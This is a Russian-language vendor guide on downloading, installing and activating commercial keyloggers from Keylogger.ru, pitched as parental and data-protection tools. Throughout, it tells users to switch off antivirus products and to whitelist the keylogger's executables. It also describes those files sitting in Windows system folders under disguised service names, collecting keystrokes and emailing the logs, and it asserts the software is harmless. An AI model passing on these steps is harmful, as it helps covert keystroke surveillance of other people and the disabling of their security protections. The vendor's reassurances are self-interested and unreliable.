How can Keylogger be downloaded, installed and set?


В нашу эпоху скоростных информационных потоков и жажды обезопасить свою жизнь и свой бизнес, когда с каждым днём всё чаще взрываются информационные бомбы с откровениями о взломах, слежке, кражах, иных методах выуживания ключевой информации, очень важно быть начеку. Для нашей нормальной жизни компанией СКМ Системс были выпущены продукты информационной безопасности - Кейлоггеры и Сонары. Основной смысл данных программ - сохранение собственных данных, которые нужно защитить от потери, контроль за детьми и родственниками, которые слабее разбираются в информационных просторах Сети, и которых важно обезопасить от угроз бурлящего мира.


Представленные продукты не являются вредоносными программами. Они не предназначены для скрытой установки в систему без ведома владельца этой системы. Да, их можно установить в компьютерную систему, лишь имея доступ к этой системе. Ничего вредоносного! Контролируешь своего ребёнка = имеешь доступ к своему компьютеру(ноутбуку) = помогаешь вырасти ребёнку культурным и защищённым, ограждённым от извращённых реалий экстремального бытия.
Итак, скачивать программы нужно только с официального сайта.


Если Вы нашли программу в одном из множества специализированных каталогов программ, то поищите рядом со строкой "скачать программу" ссылку на официальный сайт. Только с официального сайта можно скачать проверенный инсталляционный файл программы, а разработчик продукта гарантирует, что никакого чужеродного вредоносного вирусного кода не внедрено в программу. В данном случае, все программы информационной безопасности ждут вас на сайте www.Keylogger.ru

И тут проявляется первая опасность:


Вы пытаетесь открыть в браузере сайт, а установленный в вашей системе антивирусный продукт (Norton Antivirus, McAfee, Avast, Avira, AVG, Kaspersky Internet Security, ESET NOD32, DrWeb, Microsoft Essentials, Windows Defender и другие), без спроса блокирует вам доступ к Кейлоггерам, так как сам термин кейлоггер обозначает "программу, логирующую данные" (по-народному: клавиатурный шпион), давно стал именем нарицательным, приобрёл негативную окраску, вследствие чего бездумно метится многими антивирусными компаниями как вредоносная программа, и, по умолчанию, активный антивирусный продукт мешает вам попасть на сайт, содержащий в названии домена ключевое слово Keylogger. Как тут быть?

Ответ: Временно отключить ваш антивирусный продукт. Открыть в браузере сайт www.Keylogger.ru и скачать желаемый вами продукт: Кейлоггер или Сонар.


Если ваша антивирусная программа позволила вам зайти на сайт www.Keylogger.ru и скачать Кейлоггер, то, скорее всего, Вы неожиданно обнаружите, что кейлоггер будет заблокирован или удалён (возможно без спроса, бесследно с компьютера) вашим антивирусом. Как поступить? Как позволить системе с массивом уже бесконтрольно живущих в ней программ всё-таки установить честный Кейлоггер?

Ответ: Временно отключить ваш антивирусный продукт, переведя его в интерактивный режим (когда он начинает с вами общаться, спрашивая: что делать с этим Кейлоггером? удалить? заблокировать? разрешить?), либо в ручной режим, и добавить скаченный Кейлоггер в список Исключений вашей антивирусной программы, чтобы она больше его не блокировала.

Но если ваш компьютер работает без установленной в систему антивирусной программы, что редко встречается в наше время, то вам нечего опасаться вышеупомянутых трудностей.

Вы успешно скачали и установили официальный Кейлоггер, который не является вирусом, не ворует данные и не вредит системе.

 



Теперь учтите, что программа Keylogger Lite работает и на компьютере, не имеющем доступ в Интернет, что снимает все подозрения о возможных утечках персональных данных в неизвестном направлении. После её установки нажмите одновременно 3 "горячие клавиши": Ctrl+Shift+Esc и в открывшемся окне в закладке Приложения найдите файл winckm.exe
Если он есть, значит антивирусная программа не заблокировала Кейлоггер Лайт.
При установке Кейлоггер серии NET (Keylogger NET, Keylogger NET Plus, Keylogger X, Keylogger XE, Keylogger NET4, Keylogger NET4XT) устанавливает из дистрибьютива программы (инсталятора) 3 файла:
stmode.exe + wmuser.exe + sqlite3.dll в системную папку.
В 32-битных системах эта папка - C: Windows : system32
В 64-битных системах эта папка - C: Windows : SysWow64

 


Установив программу с правами Администратора, обязательно проверьте - работают ли процессы stmode и wmuser - нажав горячие клавиши Ctrl+Shift+Esc в закладке Процессы "для Всех пользователей". Не запускайте установленные файлы вручную, так как они запускаются системой при старте.

 



И что же это за процессы?


wmuser - собирает логи, в системных Службах именуется как System user options application
stmode - отправляет логи, в системных Службах именуется как Stable system processing
sqlite3.dll - библиотека, позволяющая нормально обрабатывать данные.

Помните, что иногда урезанные системы Windows, либо настроенные с ограничением прав пользователя, могут отказаться записывать один, два или все три файла из дистрибьютива в нужную папку. Как быть в этом случае?
Просто: проверьте наличие файлов stmode.exe и wmuser.exe в папках C: Windows : system32 и C: Windows : SysWow64
В одну из них они должны установиться. Теперь скопируйте их в обе папки.
В папках C: Windows + C: Windows : system32 и - если есть папка - C: Windows : SysWow64 обязательно должен быть файл sqlite3.dll
Если этого файла нет, скачайте его с этого сайта или с другого сайта - и скопируйте в эти папки.

Если все 3 файла - на месте, логирование началось, а через указанное в описании программы время пришёл первый лог, то это ещё не полный успех. Антивирусная программа может сделать своё дело и удалить процесс wmuser или stmode. Участились случаи, когда антивирусная программа удаляет файлы Кейлоггера после 2 или 3 перезагрузки системы. Как этого избежать?

Ответ:  нужно добавить установленные файлы Кейлоггера в Исключения (или Доверенные) в соответствующем разделе вашей антивирусной программы - в Настройках. Подробную инструкцию - как это сделать - ищите в Справке к антивирусной программе, либо на её официальном сайте или на форумах.
Обычно, заходите через основное окно антивирусной программы в Расширенные настройки - Исключения и вводите руками полный путь к 2 файлам:
C: Windows : system32 : stmode.exe и - если есть - C: Windows : SysWow64 : stmode.exe + C: Windows : system32 : wmuser.exe и - если есть - C: Windows : SysWow64 : wmuser.exe
После данной процедуры ваш антивирус не должен ругаться, удалять, блокировать Кейлоггер, даже после обновления антивирусных баз.

Обратите внимание на антивирус Microsoft Security Essentials и Windows Defender, которые молча встроены во многие системы и служат для блокирования нормальной работы кейлоггеров. Если они есть в вашей системе, то нужно добавить 2 файла Кейлоггера в Исключения, как описано выше.

Всё! Если антивирусным программам в вашей системе не позволено трогать файлы Кейлоггера, а вам удалось зайти на официальный сайт, скачать, установить программу, то логи должны стабильно поступать на ваш E-mail или во Вьюер.

Ну, а если в вашей системе не установлена антивирусная программа, то всё очень просто:
открыли сайт www.Keylogger.ru - скачали нужный кейлоггер - установили - пользуйтесь.
Все программы имеют тестовый период, за который показывают весь свой функционал без ограничений.


Если вам понравилась работа Кейлоггера или Сонара, то можете его активировать.
Программа Keylogger Lite и Сонары активируются вводом Кода активации локально в окне самих программ. Код активации действителен пожизненно, если не переустанавливать систему Windows.

Программы серии Keylogger NET можно активировать удалённо в течение 5 суток после установки. Для их активации ничего вводить локально на компьютере уже не придётся. Их активация производится на желаемый период. Активацию можно переносить с версии на версию, с компьютера на компьютер.